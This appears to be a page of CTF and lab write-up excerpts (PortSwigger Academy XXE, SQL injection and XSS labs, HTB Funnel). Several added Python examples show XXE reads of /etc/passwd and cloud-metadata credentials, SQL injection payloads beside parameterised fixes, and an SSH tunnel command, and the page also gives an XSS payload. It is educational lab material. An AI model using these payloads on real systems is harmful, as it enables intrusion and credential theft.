CTFs

OWASP Juice Shop – Score Board Challenge

Some time ago we explained how to install the OWASP Juice Shop. This first post of 2024 explains how to get started with this vulnerable application. The first step is finding the score board. To find it, we search the JavaScript files for "score" using the browser inspector and get several matches. Checking some of those matches we find a promising option: /score-board. If we test it: http://localhost:3000/#/score-board we

Burp Suite Academy: Exploiting XXE to perform SSRF attacks

This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response. The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive. To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server's IAM secret access

Burp Suite Academy: Exploiting XXE using external entities to retrieve files

This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response. To solve the lab, inject an XML external entity to retrieve the contents of the /etc/passwd file. Checking the request using Burp: Looking at the PortSwigger XML external entity (XXE) injection documentation we can learn a bit about this vulnerability. Send the request to Repeater and add the payload. The response will be:
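Both XXE labs above rely on the same mechanism: the server's XML parser, not the attacker, fetches whatever the entity's SYSTEM identifier names and echoes it back inside the "Invalid product ID" message. The following is an added example, not code from the labs or from PortSwigger, that models the vulnerable "Check stock" parser with Python's stdlib expat binding. The RESOURCES table is a constructed stand-in for the real file reads and metadata requests, so it runs offline; the stockCheck/productId element names match the lab request, and the credential value is made up.

```python
import xml.parsers.expat

# Constructed stand-ins for what the lab server would fetch when it resolves an
# external entity. The key point: the *parser* performs the read or HTTP request,
# so whoever controls the SYSTEM identifier controls what the server reaches.
RESOURCES = {
    "file:///etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n",
    "http://169.254.169.254/": b"latest",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/": b"admin",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin":
        b"SecretAccessKey: EXAMPLE-NOT-A-REAL-KEY",
}


def xxe_payload(system_id: str) -> bytes:
    """Build the stock-check body with productId replaced by an external entity."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "{system_id}">]>'
        "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
    ).encode()


def check_stock(xml_bytes: bytes, resolve_external: bool) -> str:
    """Return the productId text the server would echo back.

    resolve_external=True models the vulnerable parser: it fetches whatever the
    entity's SYSTEM identifier names. With False the reference is refused and
    expat raises ExpatError instead of expanding it.
    """
    parser = xml.parsers.expat.ParserCreate()
    path, product_id = [], []

    def start(name, attrs):
        path.append(name)

    def end(name):
        path.pop()

    def chars(data):
        if path and path[-1] == "productId":
            product_id.append(data)

    def external_ref(context, base, system_id, public_id):
        if not resolve_external:
            return 0  # abort the parse: expat reports an external-entity error
        body = RESOURCES.get(system_id, b"")  # stands in for open()/urlopen()
        # A child parser shares the parent's handlers, so the fetched bytes are
        # delivered to chars() exactly as if they were inline in <productId>.
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(body, True)
        return 1

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.ExternalEntityRefHandler = external_ref
    parser.Parse(xml_bytes, True)
    return "".join(product_id)


def safe_check_stock(xml_bytes: bytes):
    """Hardened variant: any external entity reference is rejected (returns None)."""
    try:
        return check_stock(xml_bytes, resolve_external=False)
    except xml.parsers.expat.ExpatError:
        return None


if __name__ == "__main__":
    for target in RESOURCES:
        print(target, "->", check_stock(xxe_payload(target), resolve_external=True))
    print("hardened:", safe_check_stock(xxe_payload("file:///etc/passwd")))
```

Walking the metadata URLs in order (root, then the security-credentials listing, then the role name it returns) is exactly the iteration the SSRF lab expects. The defence is not in the payload handling but in the parser configuration: with expat, external entities are only fetched if an ExternalEntityRefHandler is installed that does so; with parsers that resolve external entities by default, that option has to be switched off explicitly.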

Burp Suite Academy: SQL injection vulnerability allowing login bypass

This lab contains a SQL injection vulnerability in the login function. To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user. Click on "My account": We can see that the request is sent by POST. The value we add to the username field will be included in the request. We'll use this field directly in the browser to add the payload. We can try the

Burp Suite Academy – SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following: SELECT * FROM products WHERE category = 'Gifts' AND released = 1 To solve the lab, perform a SQL injection attack that causes the application to display details of all products in any category, both released and unreleased. https://0aca0089049c37728097175e00b9006c.web-security-academy.net https://0aca0089049c37728097175e00b9006c.web-security-academy.net/filter?category=Accessories As the vulnerability is
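The two SQL injection labs above (login bypass, and the WHERE clause returning hidden rows) share one root cause: user input is concatenated into the SQL text, so a single quote ends the intended string and a `--` comment discards the rest of the condition. The following is an added example, not the labs' own server code, that reproduces both queries against a constructed in-memory SQLite database and shows the parameterised versions beside them. Table contents, the administrator's password and the product names are made up.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed tables standing in for the lab's database."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'not-the-real-password'),
                                 ('wiener', 'peter');
        CREATE TABLE products (name TEXT, category TEXT, released INTEGER);
        INSERT INTO products VALUES ('Gift card', 'Gifts', 1),
                                    ('Unreleased gift', 'Gifts', 0),
                                    ('Umbrella', 'Accessories', 1);
    """)
    return con


def login_vulnerable(con, username, password):
    """Login handler that splices the POSTed fields into the SQL string (the lab's bug).

    username = administrator'--  turns the query into
    ... WHERE username = 'administrator'--' AND password = '...'
    so the password check is commented out.
    """
    sql = (f"SELECT username FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(con, username, password):
    """Same query with bound parameters: the quote and comment stay inside the value."""
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def filter_vulnerable(con, category):
    """Category filter built by concatenation, as in the WHERE-clause lab.

    category = Gifts' OR 1=1--  makes the WHERE clause always true and comments
    out "AND released = 1", so unreleased products come back too.
    """
    sql = f"SELECT name FROM products WHERE category = '{category}' AND released = 1"
    return sorted(r[0] for r in con.execute(sql))


def filter_fixed(con, category):
    """Bound parameter: the whole string is compared as a category name."""
    return sorted(r[0] for r in con.execute(
        "SELECT name FROM products WHERE category = ? AND released = 1", (category,)))


if __name__ == "__main__":
    con = build_db()
    print(login_vulnerable(con, "administrator'--", "anything"))
    print(login_fixed(con, "administrator'--", "anything"))
    print(filter_vulnerable(con, "Gifts' OR 1=1--"))
    print(filter_fixed(con, "Gifts' OR 1=1--"))
```

In the lab itself the second payload is sent URL-encoded in the query string (`/filter?category=Gifts'+OR+1=1--`); the comment syntax (`--`, `#`, `/* */`) that works depends on the database behind the application.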

Burp Suite Academy – DOM XSS in document.write sink using source location.search inside a select element

This lab contains a DOM-based cross-site scripting vulnerability in the stock checker functionality. It uses the JavaScript document.write function, which writes data out to the page. The document.write function is called with data from location.search which you can control using the website URL. The data is enclosed within a select element. To solve this lab, perform a cross-site scripting attack that breaks out of the select element and calls the alert function. Select any element: https://0a060014049d514780bc08700015003f.web-security-academy.net/product?productId=1 This script gets the param

Burp Suite Lab Academy – Reflected XSS into a JavaScript string with angle brackets HTML encoded

This lab contains a reflected cross-site scripting vulnerability in the search query tracking functionality where angle brackets are encoded. The reflection occurs inside a JavaScript string. To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the alert function. Go to the lab URL. According to the description, the vulnerability is located in the search functionality: Checking the inspector we can see that the URL running

Burp Suite Lab Academy – Stored XSS into anchor `href` attribute with double quotes HTML-encoded

This lab contains a stored cross-site scripting vulnerability in the comment functionality. To solve this lab, submit a comment that calls the alert function when the comment author name is clicked. Go to the lab: According to the description, the vulnerability is in the comment functionality. Now we can see our comment in the source: Intercepting the request: Checking the Burp Suite XSS documentation and based on the source code obtained after adding a new comment,

HTB Funnel

$ nmap -v -sV -p- 10.129.74.179 --min-rate 5000 $ ftp 10.129.74.179 Users detected: According to the password policy found, the default password is funnel123#!# $ ssh christine@10.129.74.179 Which service is running on TCP port 5432 and listens only on localhost? christine@funnel:~$ ss -tulpn Port 5432 is usually used by PostgreSQL. As we don't have access to the previously mentioned service from our local machine, we need to create a tunnel
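The step the HTB Funnel write-up is describing is: read `ss -tulpn` on the box, pick out the listeners bound only to a loopback address (those are unreachable from the attacking machine), and forward one of them over the SSH session you already have. The following is an added example, not part of the write-up, that does the loopback check over a constructed `ss -tulpn` listing modelled on the box (the listing is made up, not the page's output) and builds the `ssh -L` local forward for the port found. The user and IP are the ones the write-up uses.

```python
# Constructed `ss -tulpn` output, modelled on a host with PostgreSQL bound to
# loopback only and SSH/FTP exposed on all interfaces. Not the page's own output.
SS_OUTPUT = """\
Netid State  Recv-Q Send-Q   Local Address:Port  Peer Address:Port Process
tcp   LISTEN 0      244          127.0.0.1:5432       0.0.0.0:*
tcp   LISTEN 0      128            0.0.0.0:22         0.0.0.0:*
tcp   LISTEN 0      32             0.0.0.0:21         0.0.0.0:*
tcp   LISTEN 0      128               [::]:22            [::]:*
udp   UNCONN 0      0        127.0.0.53%lo:53         0.0.0.0:*
"""


def parse_listeners(ss_text):
    """Yield (proto, local_host, local_port) for each socket line (header skipped)."""
    listeners = []
    for line in ss_text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 5:
            continue
        proto, local = fields[0], fields[4]
        host, port = local.rsplit(":", 1)      # "[::]:22" -> "[::]", "22"
        listeners.append((proto, host, int(port)))
    return listeners


def is_loopback(host):
    """True for 127.0.0.0/8 and ::1; strips the %iface suffix and IPv6 brackets."""
    host = host.split("%")[0].strip("[]")
    return host.startswith("127.") or host == "::1"


def localhost_only_ports(ss_text, proto="tcp"):
    """Ports of the given protocol that are reachable only from the box itself."""
    return sorted({port for p, host, port in parse_listeners(ss_text)
                   if p == proto and is_loopback(host)})


def tunnel_command(user, target, remote_port, local_port=None):
    """SSH local forward: local_port on the attacker -> 127.0.0.1:remote_port on the box."""
    local_port = local_port or remote_port
    return f"ssh -L {local_port}:127.0.0.1:{remote_port} {user}@{target}"


if __name__ == "__main__":
    for port in localhost_only_ports(SS_OUTPUT):
        print(port, "->", tunnel_command("christine", "10.129.74.179", port))
```

After the forward is up, the service is reached on the attacking machine as if it were local, e.g. a PostgreSQL client pointed at 127.0.0.1:5432 with christine's credentials.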

Burp Suite Academy Lab – Reflected XSS into attribute with angle brackets HTML-encoded

This lab contains a reflected cross-site scripting vulnerability in the search blog functionality where angle brackets are HTML-encoded. To solve this lab, perform a cross-site scripting attack that injects an attribute and calls the alert function. "><script>alert(document.domain)</script> Checking Burp Suite Academy for Cross-Site Scripting, we find that if angle brackets are blocked or encoded, you won't be able to break out of the tag in which your input appears, so we can try other